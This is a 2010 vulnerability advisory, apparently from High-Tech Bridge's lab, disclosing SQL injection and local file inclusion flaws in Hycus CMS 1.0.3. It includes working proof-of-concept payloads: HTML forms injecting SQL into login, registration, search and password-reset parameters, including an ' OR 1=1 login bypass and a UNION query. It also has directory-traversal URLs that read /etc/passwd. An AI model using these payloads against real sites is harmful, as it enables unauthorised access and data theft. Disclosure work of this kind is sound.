Total Tests:

Multiple Vulnerabilities in Hycus CMS

Advisory ID:HTB22737
Product:Hycus CMS
Vendor:Hycus Web Development Team
Vulnerable Versions:1.0.3 and probably prior
Tested Version:1.0.3
Advisory Publication:December 7, 2010 [without technical details]
Vendor Notification:December 7, 2010
Public Disclosure:December 21, 2010
Vulnerability Type:SQL Injection [CWE-89]
PHP File Inclusion [CWE-98]
CVE References:CVE-2010-4612
CVE-2010-4613
Risk Level:High
CVSSv2 Base Scores:7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Hycus CMS which could be exploited to perform SQL injection attacks, gain access to sensitive information and compromise vulnerable system.

1) SQL injection vulnerabilities in Hycus CMS: CVE-2010-4612
The vulnerability exists due to input sanitation errors in the "user_name", "usr_email", "q" and "useremail" parameters in index.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation examples:
1.1
<form action="http://[host]/?user/1/hregister.html" method="post" name="main" >
<input type="hidden" name="full_name" value="username"/>
<input type="hidden" name="user_name" value="1'SQL_CODE"/>
<input type="hidden" name="usr_email" value="test@mail.com'SQL_CODE"/>
<input type="hidden" name="pwd" value="123456"/>
<input type="hidden" name="pwd2" value="123456"/>
<input type="submit" value="submit" name="submit" />
</form>

1.2
<form action="http://[host]/?user/1/hlogin.html" method="post" name="main" >
<input type="hidden" name="usr_email" value="1' OR 1=1 -- 1"/>
<input type="hidden" name="pwd" value="any"/>
<input type="submit" value="submit" name="submit" />
</form>

1.3
<form action="http://[host]/?search/1.html" method="post" name="main" >
<input type="hidden" name="q" value="search' union select 1,2,@@version -- 3"/>
<input type="submit" value="submit" name="submit" />
</form>

1.4
<form action="http://[host]/?user/1/forgotpass.html" method="post" name="main" >
<input type="hidden" name="useremail" value="1'SQL_CODE"/>
<input type="submit" value="submit" name="submit" />
</form>


2) Local file inclusion in Hycus CMS: CVE-2010-4613
Input passed to the "site" parameter via index.php and admin.php is not properly sanitized before being used to include local files. A remote attacker can include arbitrary files on the target system using directory traversal sequences with NULL byte.
Exploitation examples:
http://[host]/index.php?site=../../../../../../../etc/passwd%00
http://[hos t]/admin.php?site=../../ ../../../../../etc/passwd%00

How to Detect SQL Injection Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Currently we are not aware of any vendor-supplied patches or other solutions. The vendor was contacted in accordance to our Vendor Notification Policy but we didn't get any answer or feedback.


References:
[1] High-Tech Bridge Advisory HTB22737 - https://www.immuniweb.com/advisory/HTB22737 - Multiple Vulnerabilities in Hycus CMS
[2] Hycus CMS - hycus.com - Hycus CMS is a free, open source PHP based content management system.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential